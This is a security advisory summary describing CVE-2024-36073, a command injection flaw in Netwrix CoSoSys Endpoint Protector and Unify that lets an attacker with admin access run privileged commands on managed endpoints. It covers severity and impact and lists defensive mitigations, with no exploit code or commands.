CVE-2024-36073 is a remote code execution vulnerability identified in the shadowing component of Netwrix CoSoSys Endpoint Protector (versions through 5.9.3) and CoSoSys Unify (versions through 7.0.6). The shadowing component is responsible for mirroring or managing endpoint configurations. An attacker who has already obtained administrative access to the Endpoint Protector or Unify server can exploit this vulnerability to overwrite sensitive configuration files. This manipulation enables the attacker to execute arbitrary system commands with SYSTEM (Windows) or root (Linux/macOS) privileges on a chosen client endpoint managed by these solutions. The vulnerability is classified under CWE-77 (Improper Neutralization of Special Elements used in a Command), indicating command injection risks. The CVSS v3.1 base score is 7.2, reflecting high severity due to network attack vector, low attack complexity, required privileges (high), no user interaction, and high impact on confidentiality, integrity, and availability. Although no public exploits are reported yet, the potential for attackers to leverage administrative access to gain full control over endpoints is significant. This vulnerability highlights the risk of trust relationships between management servers and endpoints in enterprise data loss prevention and device control solutions.

The vulnerability allows attackers with administrative access to the management server to execute arbitrary commands with the highest privileges on client endpoints. This can lead to full compromise of endpoint devices, including data theft, installation of persistent malware, lateral movement within the network, and disruption of endpoint operations. Confidentiality is severely impacted as sensitive data on endpoints can be accessed or exfiltrated. Integrity is compromised because attackers can alter system configurations and files. Availability can be affected if attackers deploy destructive payloads or disrupt endpoint functionality. Organizations relying on Endpoint Protector or CoSoSys Unify for data loss prevention and device control face increased risk of insider threats or attackers who have breached administrative credentials. The scope includes all client endpoints managed by vulnerable versions of these products, potentially spanning large enterprise environments.

1. Immediately upgrade Netwrix CoSoSys Endpoint Protector to a version later than 5.9.3 and CoSoSys Unify to a version later than 7.0.6 once patches are released by the vendor. 2. Until patches are available, restrict administrative access to the Endpoint Protector and Unify servers to trusted personnel only and enforce strong multi-factor authentication to reduce risk of credential compromise. 3. Monitor and audit administrative actions on these servers for unusual configuration changes or command executions. 4. Implement network segmentation to limit access between management servers and client endpoints, reducing the attack surface. 5. Employ endpoint detection and response (EDR) solutions on client devices to detect anomalous command execution or privilege escalation attempts. 6. Review and harden configurations of the shadowing component if possible, disabling unnecessary features or services. 7. Conduct regular security assessments and penetration tests focusing on management infrastructure to identify and remediate privilege escalation paths. 8. Educate administrators on the risks of credential compromise and enforce least privilege principles.